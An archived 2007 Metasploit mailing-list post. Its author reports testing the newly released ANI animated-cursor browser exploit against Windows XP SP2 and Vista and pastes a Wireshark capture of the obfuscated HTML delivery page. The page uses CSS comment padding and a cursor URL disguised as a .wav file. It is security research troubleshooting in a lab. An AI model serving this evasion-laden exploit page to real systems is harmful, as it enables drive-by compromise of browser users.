[framework] Metasploit vs ANI

Nicolas RUFF nicolas.ruff at gmail.com
Mon Apr 2 03:58:53 CDT 2007 

> Two new exploit modules are available for version 3.0 of the Metasploit 
> Framework. These modules can be obtained by using the 'Online Update' 
> feature in Windows and the 'svn update' command on Unix-like systems.
> 
> Matt Miller posted to the Metasploit Blog about our ANI efforts:
> http://blog.metasploit.com/
> 
> The two exploits can be viewed in the svn repository at metasploit.com:
> http://metasploit.com/svn/framework3/trunk/modules/exploits/windows/browser/ani_loadimage_chunksize.rb
> http://metasploit.com/svn/framework3/trunk/modules/exploits/windows/email/ani_loadimage_chunksize.rb

Nice work!

I've just been testing ANI/HTTP payload against XPSP2 and Vista, and the
Web page seems somewhat "corrupted". As a result, IE displays ASCII
characters without even crashing.

I cannot even see the "anih" header. The page might be GZIP'ed even if
default options are set to turn off all evasion techniques. What do you
think ?

Filtered Wireshark transcript below (non-printable characters removed).

---------------------------------------------------------------------------------
GET /lol HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, */*
Accept-Language: fr
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 172.16.21.131:8080
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Content-Length: 2190
Connection: Keep-Alive
<html><head><title>iwIoCkcqMXo7NUF4jAab7WfntgguEDrbsQx15s1ofLRvJEKy1flkODQg8I974dg8U8kaDfJr0U6</title></head><body>XGbXGxssfFg0v45z0GrMpAdpKH5tv71MoP4orVvRg5L7JCv1wklX4EoDjouIQ9jvQg3zHit4bGryWUZy<div
style='...
/*
...
ZX6LrSqnsg3GSVC0SNA2zqW7m7U9s88ug4q4TUBh03dAo7QcMlzgbTVLb9U8ObHzq3Si4SFLOfGWppqEVA
...*/
CursOR
/*
oNVff76dUP3s62xTrUKNr5IcmLIMv8F32q62o20UuJTmI4kmNkc4BZEdP8BmUrRE6NQb1au5gaakFV5UOg8vfl7MGNqW6PvMGSSLUVeYKyFaAbH.
.*/
/*..
GWqQmaoquKHPIlTNHkHCaJPP5ecZOwgP2W0w0Pf4l77EyNBbfBimNEZkGSWU7bYWjSVaUOJbiJh
.*/.
URL(
.   /*.
 qT0bk8NjfYImQIICym7f5lvHidMBIZsGIlSTRmnsYzimxyQ8KlPXPpc1ykJE
*/
"/lol/aOqmmblrCLUVJrY0R1he7O3UdKPxCcb20QvZMSROQ9J5czCyXrQMFHNHP9crTdcLPaUBODji.wav?qZY=1"
./*
.lwgbsRjAQ34gH3SUz .
*/
.);
./*
rNpUJXbAD0XwmM3v
 */
'>IK0KlqBe5DnxRNVoCZtK94xSLyUfY3</div></body></html>
---------------------------------------------------------------------------------

Regards,
- Nicolas RUFF

More information about the framework mailing list